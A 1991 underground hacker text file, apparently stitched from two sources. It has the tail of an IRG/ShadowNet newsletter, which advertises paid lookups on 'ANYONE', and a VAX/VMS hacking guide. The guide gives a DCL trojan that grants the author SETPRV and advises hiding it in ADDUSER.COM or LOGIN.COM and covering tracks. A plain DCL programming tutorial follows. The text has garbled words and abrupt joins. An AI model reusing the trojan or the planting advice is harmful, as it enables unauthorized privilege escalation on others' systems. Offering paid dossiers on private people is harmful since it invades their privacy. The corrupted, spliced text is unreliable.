can be found easier and faster.  Of course you are not restricted to the 
computer oriented community. We can and WILL find information on ANYONE. We'll 
also work for anyone who is willing to pay. So let's hear from you, either on 
my BBS/VMB.  Give me your voice phone number, and your name.  I will contact you 
for who you want ShadowNet to find out about. If you would like to join leave 
the same info but tell me that you want to join.  Simple enough. Until Next 
time. 
 
 
9.Hellos and Goodbyes 
--------------------- 
        So you are now done reading IRG-03, I hope you enjoyed yourself.  I am 
sure the more IRG Newsletters me and The Spectral Demon put out the better they 
will get, if possible. TSD and I have worked hard on this newsletter and now its 
your turn. Hurry & get those letters in for the next IRG News.  Now for the 
hellos & goodbyes, greets and etc! 
 
        FiRM what ever happened to you? 
        INC ditto! 
        Kryptic Night do you do Magic Mushrooms? 
        PHA whats next for you? 
      * Greets to Elite Tabloid Underground 
        What ever happened to the Elite community?  Strike Back! 
        Remember:  Big Brother Is Watching 
        Freedom Of Speech! 
 

------------------------------------------------------------------------------- 
This Is An Offical IRG/ShadowNet Production All Rights Resevered 
Copy Write (C)   Jan. 1 1991 
------------------------------------------------------------------------------- 
 
        Call The IRG HeadQuarters: 
        Insanity Lane 
        Home Of IRG 
        619-591-4974 
        NuP: Last Try 
        Running Aftershock 1.21 
        Call here for the latest in IRG Productions, and invaluable P/H/C/A 
        information found nowhere else, except at: 
 
        The CorrupT SocieTy 
        IRG Node 02 
        619-630-8450 
        NuP: Defiance 
        Running AfterShock 1.21 
 
        Also Call This Fine IRG/ShadowNet VMB #1 
        1-800-527-0543 
        Box Number: 8 + 158 
First of course you MUST 
check for the privileges of the user (just like in the above program), then 
try: 
 
$open/write file sys$scratch:adduaf.tmp 
$write file "$ RUN SYS$SYSTEM:AUTHORIZE" 
$write file "MODIFY NAME/PRIV=SETPRV" 
$close file 
$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat 
$del sys$scratch:adduaf.*;* 
 
 
This little patch in the coding will modify your own users privileges and give 
them SETPRV when the superuser executes this routine.  The trick is to hide it 
within some other program so he doesn't even realize he has done anything! Of 
course after the routine has been successfully executed, the original coding 
should be put back.  There are many places you can put this routine, including 
ADDUSER.COM (if you have write access)!  That would mean, every time the 
system manager went to add a new user, he would also boost your privs! HaHa, 
quite ironic eh?!  The farthest thing that he wants to do, and you make him do 
it without even realizing.  Of course you should use your imagination and put 
this or a similar routine in a place where it will be quickly executed.  The 
longer the code stays around without being execute, the more chance that it 
will be discovered.  An optimum program would be something that the 
users/operators execute frequently (eg notes, mail, phone etc)  Other good 
places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your 
tracks once you're done!! 
 
 This is but a brief introduction to Trojans and the like.  You should use your 
own imagination to come up with other ways of making the system operators 
succumb to your wishes...heh heh. 
 
 
DCL PROGRAMMING 
--------------- 
 
 No file would be complete without at least mentioning programming Command 
Procedures.  Basically, these are like BAT files from MS-DOS or script files 
from UNIX.  They form a rudimentary but powerful language that allows you to 
quickly create small programs to handle most simple tasks.  This section is not 
intended to be a a full blown tutorial on programming in DCL, rather its an 
introduction to what it is all about. 
 It is quite easy to pick up programming in DCL and the best way to learn is to 
have a look at some of the COM files you will find on the various VAXes that 
you hack on.  By studying these, you can quickly learn the methods on how to 
perform 
certain routines.  Below I have listed some of the commonly needed routines 
when programming in DCL: 
 
 
PASSING PARAMETERS 
 
Parameters can be passed to DCL programs directly from the shell in several 
ways. Here are a few examples: 
 
(1) @sample 24 25 
 
    When you execute this, the values 24 and 25 are passed to the sample.com 
    file in the variables p1 and p2 respectively. ie p1=24, p2=25 
 
(2) @sample Paul Cramer 
 
    p1=PAUL,  p2=CRAMER 
 
(3) @sample "Paul Cramer" 
 
    p1=Paul,  p2=Cramer 
 
(4) name= "Paul Cramer" 
    @sample 'name' 
 
    This example demonstrates the m?Kof passing predefined variables to a 
    command procedure.  In this case,  p1=PAUL,  p2=CRAMER 
 
(5) name ="""Paul Cramer""" 
    @sample 'name' 
 
    Note that passing the variable in three double-quotes preserves the case. 
    p1=Paul,  p2=Cramer 
 
 
 
GETTING INPUT 
 
  Often it is necessary to get some sort of input from the user when executing 
a command procedure.  This is performed through the INQUIRE command. Some 
examples follow: 
 
(1) INQUIRE variable "prompt" 
 
    This will display the 'prompt' message and then wait for input.  The string 
    passed is kept in 'variable' 
 
(2) INQUIRE/NOPUNC variable "prompt" 
 
    When you specify /NOPUNC, the prompt will NOT be followed by a colon and 
    space as is the default. 
 
(3) INQUIRE/LOCAL variable "prompt" 
    INQUIRE/GLOBAL variable "prompt" 
 
    It should be noted that if you specify /LOCAL, the variable will remain in 
    the local symbol table accessible only by this particular COM file.  If on 
    the other hand, you specify /GLOBAL, the variable is placed in the global 
    symbol table and is made accessible to other files. 
 
(4) IF pn .eqs. "" THEN INQUIRE pn "prompt" 
 
    You can use this method to check if a certain variable (pn in this case) is 
    null or not.  If it is, you can ask for input. 
 
(5) READ/PROMPT="prompt" SYS$COMMAND variable 
 
    This is another method of getting input. 
 
 
 
SUPPLY INPUT FOR A PROGRAM 
 
Often you may need to create a file and get input from some outside source. 
Again there are several ways of doing this.  Here I will outline three 
different methods: 
 
FROM DATA      :- CREATE TEST.DAT 
                  data line 1 
                  data line 2 
                       : 
                       : 
                    etc etc 
 
FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND 
                  CREATE TEST.DAT 
 
FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT 
                  CREATE TEST.FILE 
 
 
OUTPUTTING INFORMATION 
 
In general when outputting information, you should always send it to SYS$OUTPUT 
What this does is automatically write to whatever the user has defined as 
SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it 
will send it in the correct format.  Some examples follow: 
 
(1)  WRITE SYS$OUTPUT "literal text" 
 
     This will print 'literal text' on your terminal. 
 
(2)  WRITE SYS$OUTPUT symbol-name 
 
     This will print on your terminal whatever value is held in symbol-name 
 
(3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text" 
 
     This example shows how you can mix in normal text with a variable and 
     follow it by more text. 
 
(4)  TYPE SYS$INPUT 
     this is a sample message 
     that is spread out over 
     several lines. 
 
     You would use this method whenever there are more than a few lines of text 
     to be printed. 
 
 
 
WRITING TO A FILE 
 
You will find that many times when writing a COMmand procedure you will need to 
save certain information to a file.  This can be accomplished with a routine 
similar to: 
 
OPEN/WRITE FILE TEST.DAT 
WRITE: 
 INQUIRE DATA "Input Data" 
 IF DATA .EQS. "" THEN GOTO DONE 
 WRITE FILE DATA 
 GOTO WRITE 
DONE: 
 CLOSE FILE 
 
I will give a quick breakdown of what is going on here.  First you open the 
file that you want, including the /WRITE qualifier followed by the filename. 
This sample program simply inputs data, writes each line to a file and exits 
when the user hits RETURN on a blank line.  Simple but effective text input 
facility. 
 
 
 
READING A FILE 
 
Once you have written a file, you will often need to read that information back 
in again. For example you may keep track of when the person last ran the file. 
Each time the file is run, you would save the time/date to a file, and then 
read it back in, and display it on each subsequent execution.  The sample 
structure of a read routine would be: 
 
OPEN/READ FILE TEST.DAT 
READ: 
 READ/END_OF_FILE=DONE FILE DATA 
      . 
      . 
      . 
 GOTO READ 
DONE: 
 CLOSE FILE 
 
This routine would loop and keep reading a file, one line at a time, storing 
the information in DATA until the end of file is detected. 
 
 
 
CONDITIONAL LOGIC 
 
No programming language would be complete without the ability to perform logic. 
Although it is very simplistic, it provides just enough power to handle most 
simple conditions.  Some examples: 
 
(1) IF p1 .EQS. "" THEN GOTO DEFAULT 
 
    In this example the procedure checks to see if the parameter passed in p1 
    is NULL or not.  If it is then the program branches to DEFAULT 
 
(2) IF p1 .NES. 10 THEN GOTO end_label 
           . 
           . 
           . 
    END_LABEL: 
 
    Here we see that if p1 does not equal 10 then the program branches to 
    END_LABEL, otherwise it continues. 
 
(3) COUNT = 0 
    LOOP: 
     COUNT=COUNT+1 
        . 
        . 
        . 
     IF COUNT .LE. 10 THEN GOTO LOOP 
    EXIT 
 
 
    This example shows how to establish a loop in a command procedure, using 
    the symbol COUNT and an IF statement.  The IF statement checks the value 
    of COUNT and performs an EXIT when the value is greater than 10 
 
 
EXPRESSIONS 
 
   The data operations and comparisons are listed below in order of precedence 
beginning with the highest (operations and comparisons grouped together in the 
table have the same precedence). 
 
 
   +--------+---------------------------------------------------------+ 
   Operator                    Description 
   +--------+---------------------------------------------------------+ 
      +     Indicates a positive number 
      -     Indicates a negative number 
   +--------+---------------------------------------------------------+ 
      *     Multiplies two numbers 
      /     Divides two numbers 
   +--------+---------------------------------------------------------+ 
      +     (1) Adds two numbers 
            (2) Concatenates two character strings 
      -     (1) Subtracts two numbers 
            (2) Subtracts two character strings 
   +--------+---------------------------------------------------------+ 
    .EQS.   Tests if two character strings are equal 
    .GES.   Tests if first character string is greater than or equal 
    .GTS.   Tests if first character string is greater than 
    .LES.   Tests if first character string is less than or equal 
    .LTS.   Tests if first character string is less than 
    .NES.   Tests if two character strings are not equal 
    .EQ.    Tests if two numbers are equal 
    .GE.    Tests if first number is greater than or equal to 
    .GT.    Tests if first number is greater than 
    .LE.    Tests if first number is less than or equal to 
    .LT.    Tests if first number is less than 
    .NE.    Tests if two numbers are not equal 
   +--------+---------------------------------------------------------+ 
    .NOT.   Logically negates a number 
   +--------+---------------------------------------------------------+ 
    .AND.   Combines two numbers with a logical AND 
   +--------+---------------------------------------------------------+ 
    .OR.    Combines two numbers with a logical OR 
   +--------+---------------------------------------------------------+ 
 
 
 
 
LEXICAL FUNCTIONS 
----------------- 
 
That concludes the introduction to DCL programming.  One thing that you should 
keep in mind is that many powerful string editing and environment information 
commands can be accessed from COM files.  These are called the LEXICAL 
functions There are too numerous to list them all here, so I will just provide 
a summary of the primary lexical functions and a brief description: 
 
 
 
LEXICAL       DESCRIPTION 
-------------+------------------------------------------------------------------ 
f$cvsi       !converts character string data (signed value) to an integer 
f$cvtime     !retrieves information about an absolute, combination, or delta 
              time 
f$cvui       !converts character string data (unsigned value) to an integer 
f$directory  !returns the current default directory name string 
f$edit       !edits a character string based on the edits specified 
f$element    !extracts an element from a string in which the elements are 
             !separated by a specified delimiter 
f$environment!obtains information about the DCL command environment 
f$extract    !extracts a substring from a character string expression 
f$fao        !converts the control string to an ASCII string 
f$file_attrib!returns attribute information for a specified file 
f$getdvi     !returns parameters for a specified device 
f$getjpi     !returns accounting, status and identification info for a process 
f$getsyi     !returns status and identification information about local or 
             !remote nodes. 
f$identifer  !converts an identifier in named format to its integer equivalent 
f$integer    !returns the integer equivalent of the result of an expression 
f$locate     !locates a character substring within a string and returns its 
             !offset within the string 
f$logical    !translates a logical name and returns the equivalence name string 
f$message    !returns the message text associated with a system status code 
f$mode       !shows the mode in which the process is executing 
f$parse      !parses a file spec and returns either the expanded file spec or 
             !a particular field that you specify 
f$pid        !for each invocation, returns the next PID in sequence 
f$privilege  !returns a value of TRUE or FALSE depending on whether your 
             !process privileges match the privileges listed in the argument 
f$process    !returns the current process name string 
f$search     !searches the directory and returns the full file spec for any 
              file 
f$setprv     !sets the specified privileges and returns the previous state 
f$string     !returns the string equivalent of the result of the specified 
             !expression 
f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc 
f$trnlnm     !translates a logical name and returns the equivalent name string 
f$type       !determines the data type of a symbol 
f$user       !returns the current user identification code (UIC) 
f$verify     !set or read current command procedure state 
-------------+----------------------------------------------------------------- 
 
This list just outlines the main lexical functions.  Within each function there 
may be many more subfunctions.  If you need help on any of these functions or 
their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($) 
 
 
 
ERROR MESSAGES 
-------------- 
 
 Occasionally when you are using DCL, you will come across error messages that 
are sent to you by the VAX.  Here I will give a break down of what the 
different fields in the message represent and how to interpret them. First of 
all, the general format of an error message is: 
 
%facility-l-ident, text 
 
NOTE: not all messages are ERROR messages.  Often it is only an informational 
      message telling you that a certain task was successful or whatever. In 
      any case here is what each field means: 
 
facility  -this is the name of the facility that produced the  error (for 
           example, CLI for the Command Language Interpreter). 
 
l         -this is a one letter code indicating the severity of the error. 
           The severities are: 
 
                  I - Informational      E - Error 
                  S - Success            F - Severe error 
                  W - Warning 
 
ident     -this is an abbreviation for the message text. 
 
text      -this is a short description of the nature of the error. 
 
 
Here is an example of an error message, and how to interpret it: 
 
%SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege 
 
The percent sign in the beginning tells you it is a system message from the VAX 
the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field 
(F) shows that it is a severe error.  The third field (NOCMKRNL) is a short 
abbreviation showing that you do not have the CMKRNL privilege, and the actual 
text is followed giving the error in TCHING 
 
Downloaded From P-80 Systems 304-744-2253 
 
 
Downloaded From P-80 International Information Systems 304-744-2253 12yrs+